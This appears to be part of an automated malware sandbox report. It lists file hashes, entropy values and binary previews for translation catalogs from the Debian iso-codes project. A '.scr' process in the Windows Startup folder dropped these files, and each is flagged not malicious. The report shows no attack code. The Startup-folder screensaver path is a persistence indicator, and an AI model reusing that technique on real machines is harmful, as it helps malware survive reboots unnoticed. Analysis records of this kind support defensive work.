                                                                                                    SHA-512:678FCEC027B9FD32FE8C8E85AA4859D58FBEC694A907B8ADE00B69113D4F53D09F4182C6E9C0484F5D0CC407FC3B202B91F691BE034CCD5C2C3664BC778C1739
                                                                                                    Malicious:false
                                                                                                    Preview:................,.......<.......P.......Q.......`.......E........................Midway Islands.Project-Id-Version: iso_3166-3.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: 2022-10-23 07:05+0000.Last-Translator: bgo-eiu <huyaqoob+toolforge@gmail.com>.Language-Team: Punjabi (Pakistan) <https://hosted.weblate.org/projects/iso-codes/iso-3166-3/pa_PK/>.Language: pa_PK.MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Content-Transfer-Encoding: 8bit.Plural-Forms: nplurals=2; plural=n > 1;.X-Generator: Weblate 4.14.2-dev....... .....
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 1 message, Project-Id-Version: iso_3166-1
                                                                                                    Category:dropped
                                                                                                    Size (bytes):531
                                                                                                    Entropy (8bit):5.2701660846843295
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:i4U86xxLtt02UkR/xtLLno/4FdGXmBQWiOWRl:RKjt0Uh/o/NXmGRl
                                                                                                    MD5:2CE7A70FEFF7F88EA2E4B17ECFCBA9DB
                                                                                                    SHA1:B6AC20A9A8DE7129E3962E6DFCCCDA473996A5F9
                                                                                                    SHA-256:1416F4F597E0A5F8D84EF5F038A5D0CFBFC5CEFFBC65105CF57B4E84221620DF
                                                                                                    SHA-512:BC66192CE8BE31A15AA4785DADF6A909B8EE9ADB572A1C0E74676C753BBBA77943195FE741FE36AE2FCC975F9DC61FD8951540D26BFA90E3B297F217185F558C
                                                                                                    Malicious:false
                                                                                                    Preview:................$.......,.......8.......9................Project-Id-Version: iso_3166-1.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: 2017-12-29 08:01+0000.Last-Translator: Chris Leonard <cjlhomeaddress@gmail.com>.Language-Team: Papiamento <https://hosted.weblate.org/projects/iso-codes/iso-3166-1/pap/>.Language: pap.MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Content-Transfer-Encoding: 8bit.Plural-Forms: nplurals=2; plural=n != 1;.X-Generator: Weblate 2.19-dev..
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 161 messages, Project-Id-Version: iso_3166-1 '\340\244\205\340\244\253\340\244\227\340\244\276\340\244\250\340\244\270\340\245\215\340\244\245\340\244\276\340\244\250'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):9264
                                                                                                    Entropy (8bit):4.87938890776143
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:gbUtmNfHm0SuUxZVg09TXRK7mrmnI/wbMU4HH:8Utr0Sj3g067T4n
                                                                                                    MD5:09B9241F2B5FF845553FB73D8DB2E80E
                                                                                                    SHA1:6339092165D80DFB5D948173AC4DEE4FAC0A64A4
                                                                                                    SHA-256:A459418B35E7D6A70511FB512C70B53AF3B960463CA5784F60A0351BAE7C2EA9
                                                                                                    SHA-512:99B64ADC58532FDB8F214DFBE69758DC058D636373E5642762C8F1B72C4D8865BA21B2EEC470F8390E94940559A5FE087F6A19C66E200CAED53DA169CF31F19E
                                                                                                    Malicious:false
                                                                                                    Preview:................$.......,...............................................................................................................................'......./.......6.......<.......C.......K.......b.......k.......r.......{...............................................................................................................................................&.......9.......A.......G.......S.......[.......d.......i.......q.......x.......~...............................................................................................................................................................................*.......0.......9.......@.......K.......R.......Z.......b.......j.......p.......~...............................................................................................................................................................%.......1.......=.......G.......M.......U.......\.......a.......j.......q...............................................................
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 183 messages, Project-Id-Version: iso_15924 'adlam'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):10158
                                                                                                    Entropy (8bit):5.067550693050653
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:dml8mWcxQsAQ/OltU4WjV9qWxa5hW8yfTsCCAmDFe/pJi:E8mWcxQ7zg4WjVDxa5hW8yfTsCCkh8
                                                                                                    MD5:35CF3CD8A2F3C4D48DD3596390E75267
                                                                                                    SHA1:D69295D9AEEA68742F4592BB4954025140F8CF4E
                                                                                                    SHA-256:0A16435123F21214DC9FF0A64C991437E39549C741B155E7047F8692C52B6953
                                                                                                    SHA-512:4044AFE85806997D4573886E649B7E0EC5F6F74C63878114F3979858506CB3CD2E31FA33DA8EE73C2DB0D6D8EC18D2B90F68F026262258F712C1001CA5465930
                                                                                                    Malicious:false
                                                                                                    Preview:................................x.......y...................?...........................................................................%.......-.......7.......C.......P.......Y.......`.......h.......q.......w.......~.......................................................................................:.......B...&...K.......r...........(...........................................................'.......2.......9.......A.......G.......P.......Y.......s...........,...........................................................(.......9.......O...&...f...........4...........................................................#...............B.......V.......\.......c...#...u...............................................................................!.......'.......0.......9.......G.......L.......S.......Z.......c.......m.......................................................................................*...(...4.......].......f.......n...........-...............!...........................
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 426 messages, Project-Id-Version: iso_3166-1 'Afganistan'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):23849
                                                                                                    Entropy (8bit):5.100421621186459
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:F9k3DKSosu5amzQUbWb046nbjz5wsWP48WAINiZGPX1pjMPmfriSAohMku:0o0mUUbWb048fmsWP48WAIhX1pjLjzAr
                                                                                                    MD5:994BC111FE52BEABB73C295A5D27E22F
                                                                                                    SHA1:1EB6EBB5FA33EBD831E53BBB6CE3703B064A1D58
                                                                                                    SHA-256:870CE4D74D4DFC8554BF0B9F6A68C370D7B57C9DF94AF3A7AC1E087F0CBBD32F
                                                                                                    SHA-512:FE7445A22C799B4A8D5242B52DF74B3781E715832EF25C11536ED4B80B28F89D86B2B75BA6207EABA9A8096BE593B941515CAD0F460F2D8C5D4DE9F92061B123
                                                                                                    Malicious:false
                                                                                                    Preview:................l...9............#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......$.......$......$$......7$......?$......E$......O$......W$......b$......j$......r$......}$.......$.......$.......$.......$.......$.......$.. ....$.......$.......$.. ....$.......%......3%......<%......J%......Q%......p%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......&.......&.......&.......&......%&......=&......F&......_&..,...{&.......&.......&..%....&.......&.......&.......&.......&.......'.......'.......'...... '......('..%...7'..,...]'.."....'..*....'.......'.......'.......'.......'.......(......!(......)(....../(......;(......M(......U(......](......f(......o(.......(..'....(..$....(.......(.......).......)......:)......Y)......w)......|).......).......).......).......).......).......).......).......).......).......).......*.......*.......*....../*......6*......@*......H*......S*......X*......b*......k*......r*.......*.......*......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 4615 messages, Project-Id-Version: iso_3166-2 ''Eua'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):203350
                                                                                                    Entropy (8bit):5.343325325812432
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:di9xITNlnza6nH1WDj/8doRTWkTNLE94aWp4p91e/TNM/q1kZlPpqXmbxcO:di9xAZXnHMj/MoRTWyGp9o/dirPpsYxd
                                                                                                    MD5:40D215586259B83965AC8B57928A85FD
                                                                                                    SHA1:0430148F5888D1ACE97A7A6D2C5B18C111F0B7DA
                                                                                                    SHA-256:74378BF7284FECC26753098703FA995978CC727C55B68F5DDC521EE34B52F2DF
                                                                                                    SHA-512:30ABCBD53D89FCBF029FC8B2D1D9E86F0C2A0ED78C105E3F31F2A1ADE7053BB8F906AF8BA817A63F6B33CF1E401770182CB7017EEFB501919731A8B0F76FED86
                                                                                                    Malicious:false
                                                                                                    Preview:................T........ ..................................................................&.......4.......B.......G.......O.......T.......].......b.......j..................................................................................................................................*.......4.......A.......F.......U.......\.......q.............................................................................................................................................+...$.......P.......U.......h.......o.......|............................................................................................................'.......<.......H.......T.......`.......n.......~.............................................................................................'.......3.......B.......J.......T.......^.......g...................................................................................................................%.......1.......;.......E.......P.......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 32 messages, Project-Id-Version: iso_3166-3 'Brytyjskie Terytorium Antarktyczne'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3054
                                                                                                    Entropy (8bit):5.361316406819967
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:rLf3MCqPLsGP+vGqIfdvqN5CoU9JI0XtCIb5foGdmGswo1pRV+4G8Op3YY8:rLvMCmsu+yaCoAm0X4QbVozAPo1
                                                                                                    MD5:4C6B243EE32B00D2BAD944235F83D553
                                                                                                    SHA1:5059E40E8DBFE95766D73CDE2E5F57F0568848ED
                                                                                                    SHA-256:0EB6A9B05F2980D118C928238D462BE1BE7F55A482E2B490692A36717705DC51
                                                                                                    SHA-512:44D2B8F712EC5043C2BBC74C6C27E70F32D1294F8D528C14190DD5371D68D0DECBF779FD1977E3760E529C7E508DA281A182CFC1C2C14AB94BB76996B73BB05B
                                                                                                    Malicious:false
                                                                                                    Preview:........ ...........+.......................).......*...........:.../...W...........................................)...........................9.......I.......X.......m.......z...!....................................... .......)...........5... ...N.......o...2...{...+...............H......."...6...6...Y...4...............9...........................0.......?...&...V.../...}...!...........................................................).......D......._.......t.......{...'.......4.......%.......4...........G...M...L...=....................... ....................................................................................................................................................................British Antarctic Territory.Burma, Socialist Republic of the Union of.Byelorussian SSR Soviet Socialist Republic.Canton and Enderbury Islands.Czechoslovakia, Czechoslovak Socialist Republic.Dahomey.Dronning Maud Land.East Timor.France, Metropolitan.French Afars and Issas.French Southern
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 180 messages, Project-Id-Version: iso_4217 'jednostka rozrachunkowa ADB'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):9807
                                                                                                    Entropy (8bit):5.007901355243804
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:fqF9N/6mgtEpq7MHfnS6VRyK0G/2LCntxnua06yzIsAxI0Q9c:SIKpX/S6TL0G/Uo/nua0/zIsEjQ+
                                                                                                    MD5:A93058E074503E805180D0FFCD6D980E
                                                                                                    SHA1:762D916EF563B4568A9215F8CB24205B7C237075
                                                                                                    SHA-256:5C304B8505512F84204DDA3B12003E97441404B0287E34F87430CC8DCEA7F9A3
                                                                                                    SHA-512:80A11A4FC4B68FC0931A9EFA5E50CDF2B7BA855052C8540D70EAF2BD51F3A70697FB92FF69A28F1C04B3520CA993491316647A5363C44BBF9DDD89B4A13272F2
                                                                                                    Malicious:false
                                                                                                    Preview:........................\....... .......!.......5.......=.......L.......[.......i.......w...........................................................................................1...!...3...S...9.......7...................................$.......2.......B.......Q.......[.......m.......}...........0...................................................................9.......F.......M.......Z.......`.......o.......u...............................................................................................................%.......-.......;.......I.......Z.......b.......p.......}.......................................................................................................................................(.......5.......?.......D.......T.......b.......t...........!...................................................................................1.......D.......V.......i.......r.......................................................................................................
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 2617 messages, Project-Id-Version: iso_639-3 'a-pucikwar'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):121821
                                                                                                    Entropy (8bit):5.219858213421718
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:X6rLHEEss3HK/WfwJLnWnG1cbGO4fw6VyTOsmSr4W/A0Qn1F:KXHKuwJsR5gy4W/A0Qn1F
                                                                                                    MD5:5497C2658C895B4AA9F6F44D7751CD8C
                                                                                                    SHA1:6FFC2F6234426DB16FB8802746FDD3C60C141676
                                                                                                    SHA-256:D78EBB39896773D9DF3731CE585EB28A36993F4603D9A96C9DA00CE6C470C3A6
                                                                                                    SHA-512:8118F250F7BB6B10E0348B8038A5994451ED39FBA00A49E634FA0B2D20FFBE4955212AC9742EE06876C1B1BB0FC366ACA2C59FCDA0547641678EC8B688347162
                                                                                                    Malicious:false
                                                                                                    Preview:........9........Q..............8.......9.......D.......J.......O.......U.......].......g.......t.......y.......~.......................................................................................................................................................................%.......-.......5.......<.......E.......N.......W......._.......h.......m.......w.......|.......................................................................................................3.......B.......Q.......W.......g.......................................................................................................................................3.......;.......?.......D.......Q.......Y.......q...............................................................................................................#.......).......1.......>.......E.......P.......U.......j.......p.......x...............................................................................%.......4.......I.......Z.......r...............
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 116 messages, Project-Id-Version: iso_639-5 'j\304\231zyki afroazjatyckie'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):7985
                                                                                                    Entropy (8bit):5.055735091542171
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:XohhvFk/Dxi2sJhw38iPPjRSlSE0BfCuXr5VcJHVC/xGXwZgPW+4olyhuLAinwbZ:4SDx2JI8iuSE0BfNca5sFsh6ARbpsts
                                                                                                    MD5:E40E0FF650E4772188C3786D98F3E42F
                                                                                                    SHA1:F7B8A14C76E5711403CC29AFFCDA4C66010FE22F
                                                                                                    SHA-256:A54724D34304EF2ED4F30C1ED83D2D000183A1F3372F998657D7CEA0F282A856
                                                                                                    SHA-512:C5BBA097797F358EDBE647D61CF0C30B93650D24D76860574E7BDBF8F345395B031A52CA791EB4DBCEDA5F90E6FEB1C061D93A19707B822C9762A928B39EE89C
                                                                                                    Malicious:false
                                                                                                    Preview:........t...............\............................................... .......5.......F.......W.......h.......{...............................................................&.......9.......I.......Y.......i.......y...................................!.......#...................2.......C.......T.......g.......x...$.......#.......%...........................".......:...#...P.......t.......................................................................*.......8.......H.......`.......w...............................................................................7.......G.......X.......h.......|...............................................................1.......J.......[.......l...............................................................................'.......9.......P.......a.......r...............................................................(.......9.......H.......Y.......j...........................#...............................=...........R.......i.......z...............
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 147 messages, Project-Id-Version: iso_3166-1 '\330\247\331\201\330\272\330\247\331\206\330\263\330\252\330\247\331\206'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):7217
                                                                                                    Entropy (8bit):5.051316768458637
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:moinbQJg7YJWYKp5acinqzaePXc9WYF4da1V75xy0gxV+19lDXCjTWyHBEd:m5sg7ZjR9mscUYF4daVMc9BS3WyHBEd
                                                                                                    MD5:366A0D6CD41FD47C230233714F89B220
                                                                                                    SHA1:029FAC71670ED583EC1D5EF4A6776646D125BBE1
                                                                                                    SHA-256:C4FC3836A209A8AC53200A763AE28077F71AE4D31F67868D904883FE7633A076
                                                                                                    SHA-512:BA7C897323C3C55DACC775C3F3B7406E87EF8694D7FC896C3E80A6AFEBB42550B7AE3ED8B872B34A9FF4D845FE776FA048CF5A290D45373A11D2AF4BB1EAC566
                                                                                                    Malicious:false
                                                                                                    Preview:........................L.......`.......a.......m.......u.......}...............................................................................................................................................................'.......4.......<.......E.......N.......U.......n.......s.......y.......................................................................................................................................................#.......).......0.......8.......B.......I.......P.......V......._.......i.......q.......y.......................................................................................................................................................................$.......)......./.......:.......D.......L.......U.......`.......h.......s.......{...............................................................................................................................................-.......5.......<.......H.......N.......Y.......f.......n.......y...............
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 1 message, Project-Id-Version: iso_3166-3
                                                                                                    Category:dropped
                                                                                                    Size (bytes):392
                                                                                                    Entropy (8bit):5.194422955126935
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:ilij2EYYxA9Ct0vOuvP0NXzffUWKcG/R1iMA2KMiRlF2AFeH+qsXmBQ8KMW0YEi9:i45xxjt02UkLKcG/Ki4FLeeqsXmBQWi9
                                                                                                    MD5:E6C23473919C49E446C99672EA6D3919
                                                                                                    SHA1:4D9FD55E77FC60CD347BB758F3B5212294A40014
                                                                                                    SHA-256:7AB83B8EF370FB5EA17B4F999DC1902C84F1F443B6CBF42A1157131B72F16736
                                                                                                    SHA-512:533EA4ABF70BE75D1DB1CF500B7F1DDF26BE22131F64BAA6028B22EF35A96118D526803DED589D43235EED3E81CFDA098CF3846DA5EAD014339E8E008AC0166F
                                                                                                    Malicious:false
                                                                                                    Preview:................$.......,.......8...N...9................Project-Id-Version: iso_3166-3.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: 2004-08-08 10:00+0100.Last-Translator: Alastair McKinstry <mckinstry@debian.org>.Language-Team: Pushto.Language: ps.MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Content-Transfer-Encoding: 8bit..
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 30 messages, Project-Id-Version: iso_639-3 '\330\271\330\261\330\250\331\212'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1709
                                                                                                    Entropy (8bit):5.221140796832468
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:eub7uEolNslb14o/cg8crbMUZI+p3h66H9jFXzfI:Tb6T2lb14p8MZ+p3VH9jJzfI
                                                                                                    MD5:9EDA3C598108259FD352073775D29C20
                                                                                                    SHA1:AD3CCFBF49B18C1492310D53BD20907C5D7B35BF
                                                                                                    SHA-256:D17C5DAA989974C781B51305171BA4C5F9CAE7D8699815B82528F611667D37CC
                                                                                                    SHA-512:340BBDA5773CC35573F6A971C770DD0E40C20267107F17716834F5B74F3F8B2B9C714FB443E3671C27BA07F257107B38525F68CB1F3B2653918E422899B20386
                                                                                                    Malicious:false
                                                                                                    Preview:....................)...........................................................................................................................................................(.......-.......7.......?.......F.......Q.......Y.......b.......j.......p.......v.......~...............V......._.......j.......u.......~...............................................................................................................(.......3.......>.......K.......\.......e.......t........................................................................................................................................................................................................Arabic.Armenian.Baluchi.Chinese.English.Estonian.Finnish.French.German.Hebrew.Hindi.Italian.Japanese.Kurdish.Latin.Macedonian.Malagasy.Mali.Mongolian.Persian.Polish.Portuguese.Russian.Sanskrit.Swedish.Tajik.Tatar.Turkmen.Uzbek.Project-Id-Version: iso_639-3.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-code
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 170 messages, Project-Id-Version: iso_15924 'adlam'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):9583
                                                                                                    Entropy (8bit):5.068500299418882
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:hA3+oCFr9Qfz3mRA467rVD5z0gu/36A1Xr7LrnH/:qxCfEWijVD5z0gu/36sX33nf
                                                                                                    MD5:4968DDEE9FA0FB9266728B5E75318187
                                                                                                    SHA1:FE6F6F6738FDCE0BA2D6D1B46DDE455F6216DE26
                                                                                                    SHA-256:2706135654379B14852779CCDABB5E50EF846B9DBC26DFB054113D0CBC4F4A6F
                                                                                                    SHA-512:16058A838B780C84A4D9B7A593A421E31BF733A855C961D4DA03B7E9DD3C8E5DD53B305B8EFA1DB5B7510F012A94DB57844C3F6D298D7CF8562468CF789220FC
                                                                                                    Malicious:false
                                                                                                    Preview:................l...............H.......I.......O.......U...?...d....................................................................................................... .......).......0.......8.......A.......G.......N.......a.......h.......m.......v.......|...........................................................&...........B.......S...(...g............................................................................................... .......).......C.......\...,...v...................................................................&...........F...4...u...................................................................................................#...........R.......f...............................................................................................................................................5.......G.......f.......t...................(.......................................-...............!...+.......M.......T.......[...#...a...........".......)...................
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 422 messages, Project-Id-Version: iso_3166-1 'Afeganist\303\243o'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):23926
                                                                                                    Entropy (8bit):5.0686869185368355
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:q+dXrIPXz87/N02nz3l+TxCOZGPVPhjFbjh5wsWP4XWAIziVGaPFhl5LaCpmA7BS:rdLVJnz4TxHGPVPhJtmsWP4XWAIaPBhw
                                                                                                    MD5:40C3F3E924D435BC997B96C6CCA07772
                                                                                                    SHA1:95F3ED201CB9AF0EA50FAED257E3FE56DC70110A
                                                                                                    SHA-256:B8AD6A82040B85F28C7619C802C6BA7479EC33CF9F4E8232046190F188D2B664
                                                                                                    SHA-512:5332265CAB0A40A72B62D7931FE5D708B9EF016EA9DDE2676AFBEB0678028B42DDEDD28C66510A126DD77E09C968E2C182EDCDDA46D3FCE09CF56F60C3C55005
                                                                                                    Malicious:false
                                                                                                    Preview:................L...3...|.......H#......I#......U#......]#......e#......t#......|#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......$.......$.......$......%$.......$......6$......>$......E$......K$......S$.. ...Z$......{$.......$.. ....$.......$.......$.......$.......$.......$.......%....../%......A%......J%......W%......_%......j%......s%......|%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......&..,...#&......P&......X&..%...^&.......&.......&.......&.......&.......&.......&.......&.......&.......&..%....&..,....'.."...2'..*...U'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......(.......(.......(......3(..'...A(..$...i(.......(.......(.......(.......(.......).......)......$)......,)......3)......A)......R)......b)......~).......).......).......).......).......).......).......).......).......).......).......).......).......*.......*.......*.......*......(*....../*......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 31 messages, Project-Id-Version: iso_3166-3 'Territ\303\263rio Ant\303\241rctico Brit\303\242nico'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2716
                                                                                                    Entropy (8bit):5.215108741870437
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:VAD5GRTMtiTKPvGqIfdvqNuoUS2wnasqQ1K9PjvsQfHvX:qD6+yBop9nVAP//vX
                                                                                                    MD5:B39C3FDEDA58AF7DC4F0D2682A0A1412
                                                                                                    SHA1:2858B6F40E119BB80CBA5A1B43B777F995F057B1
                                                                                                    SHA-256:C39A530C9F2D5CB558CB4DDACD38B8E674691E9286FAFF7C81B8B82A8EDE6837
                                                                                                    SHA-512:FD464AE9E1B98940740D382D1454D93414F469B11A98F17210713A533A87127E9E467C6E205026EAA0865F5AC7F6FFAE17E3A849BE3AB78F814F68C8ABC1666C
                                                                                                    Malicious:false
                                                                                                    Preview:....................).......................).......*...........".../...?.......o.......w...........................)...........................!.......1.......@.......U.......b...!...o................................... .......)............... ...6.......W...2...c..................."...O...)...r.../...............3................... .......5.......A.......W...'...v...#.......................................................7...'......._.......x...................,.......4...............#... .......D...8...N................................................................................................................................................................................British Antarctic Territory.Burma, Socialist Republic of the Union of.Byelorussian SSR Soviet Socialist Republic.Canton and Enderbury Islands.Czechoslovakia, Czechoslovak Socialist Republic.Dahomey.Dronning Maud Land.East Timor.France, Metropolitan.French Afars and Issas.French Southern and Antarctic Territori
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 166 messages, Project-Id-Version: iso_4217 'Unidade de conta ADB'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):9110
                                                                                                    Entropy (8bit):4.957515593660907
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:TItbtfmvwmZIVqMDdgjCnMLCkmRTxzv7V6:TIDmYme9Ddgmn2D0TJv7V6
                                                                                                    MD5:FFEF2559C1CF005913FA27E9ABC6F896
                                                                                                    SHA1:E86C13678E0C049ADBAD4CC4EF7F98841E4B3491
                                                                                                    SHA-256:6201CD9C69FCFEBC1D8B152692A8B6524C570FD3B7167B75E833859E8F145631
                                                                                                    SHA-512:93105127EF6CC710AE1D32F3EC487D78E0418A63B7C8999E6A84E4A5CC9A624FC4DF9026B3E4DA9DE08B310C677DFBC389B7001E0A83AAFAFB245F1FB598F58F
                                                                                                    Malicious:false
                                                                                                    Preview:................L.......|.......................................$.......3.......A.......O.......a.......q...........................................................1.......3.......9...<...7...v.......................................................................".......2.......H...0...U...............................................................................................................*......./.......E.......T.......f.......u.......z..............................................................................................................."...............>.......N.......^.......c.......h.......v.......}.......................................................................................................................!...............>.......Q.......W.......].......l.......{.......................................................................................#.......-.......>.......L.......\.......e.......t.......y.......................................................
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 369 messages, Project-Id-Version: iso_639-3 'abkhazian'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):15062
                                                                                                    Entropy (8bit):4.756833161638407
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:DDuq8Y5/WaOxSY1/uPYZFMGpEfSA5j1XBTK9IW:DDuHYEqju9V
                                                                                                    MD5:FE4C24514FF841682A6B682DC9A2F5A2
                                                                                                    SHA1:94096D2DDC32F14C6CA309280B64A1C71A58D6E6
                                                                                                    SHA-256:E7A033952C0A977118F4B7A33CD84DC55257D95B07957FD91823EC7BE8CEDDE0
                                                                                                    SHA-512:B3B7AF4B367DFD427B7C4829A85FFD4EDC03C1D0AAD91570D554E419D4263A3AD5C0451517730668F46B15F609228D5208757BF4BEC850ECD082DD03AF16463C
                                                                                                    Malicious:false
                                                                                                    Preview:........q...............,...............................................................(.......2.......7.......<.......E.......N.......d.......j.......r.......y........................................................................................................................ ....... ....... ....... ....... ......' ......3 ......; ......D ......J ......R ......Z ......f ......k ......r ......{ ....... ....... ....... ....... ....... ....... ....... ....... ....... ....... ....... ....... ....... ....... ....... .......!.......!.......!.......!....../!......=!......D!......L!......U!......Z!......`!......n!......w!......}!.......!.......!.......!.......!.......!.......!.......!.......!.......!.......!.......!.......!.......!.......!.......!.......!.......!......."......."......)"....../"......9"......B"......F"......M"......S"......["......b"......j"......n"......u"......~"......."......."......."......."......."......."......."..#....".......".......".......#.......#.......#......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 183 messages, Project-Id-Version: iso_15924 'Adlam'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):10363
                                                                                                    Entropy (8bit):5.080362981842153
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:dQV80THghBgXzltU4WjV9qWxa5hW8WH/3BE13XjQD/k:C+0rjzg4WjVDxa5hW80/3BA38bk
                                                                                                    MD5:C04EBC0851AD52DD6A64D9AC00FE939D
                                                                                                    SHA1:30B459E575196FE9EDBB50FE7D5671CE03D2032F
                                                                                                    SHA-256:F0F6C4A10711BC88E01C7A1F416D3486774332EC265996184CD02CB14E7419CF
                                                                                                    SHA-512:A30BACE449D4E1990BD883470358A7697FD52D5D3F66F40356794B914C315C8792C20CA65038F2D5CA60D8C3694C093D91B19207F94A74D7D4D435EC91632603
                                                                                                    Malicious:false
                                                                                                    Preview:................................x.......y...................?...........................................................................%.......-.......7.......C.......P.......Y.......`.......h.......q.......w.......~.......................................................................................:.......B...&...K.......r...........(...........................................................'.......2.......9.......A.......G.......P.......Y.......s...........,...........................................................(.......9.......O...&...f...........4...........................................................#...............B.......V.......\.......c...#...u...............................................................................!.......'.......0.......9.......G.......L.......S.......Z.......c.......m.......................................................................................*...(...4.......].......f.......n...........-...............!...........................
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 423 messages, Project-Id-Version: iso_3166-1 'Afeganist\303\243o'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):24079
                                                                                                    Entropy (8bit):5.071022406882597
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:taDYOckDRD2S9/P962mKR4DpQqYbEbjh5wsWP4XWAINiVGdDPBCCGl2cMp/AUy3T:naD2Sl9lZ2pMbgtmsWP4XWAInDPBCN2o
                                                                                                    MD5:5CD8FC735C8B9EFC74C3E59A16915026
                                                                                                    SHA1:D867169C040BFF3FFDE2953FEFB0819D03944EEF
                                                                                                    SHA-256:3766494865E7A3B5FA15758F748B80C25AD8DE88149F016AE79F7BD9AC352506
                                                                                                    SHA-512:059576A0630956C3EDA770F3DF62AFFDB3ABB168D46A334DE7A0E0512F53797A6C7085501FBB0CDA215EEFB87204C010464DB9B568036DA514B6779B9C38E951
                                                                                                    Malicious:false
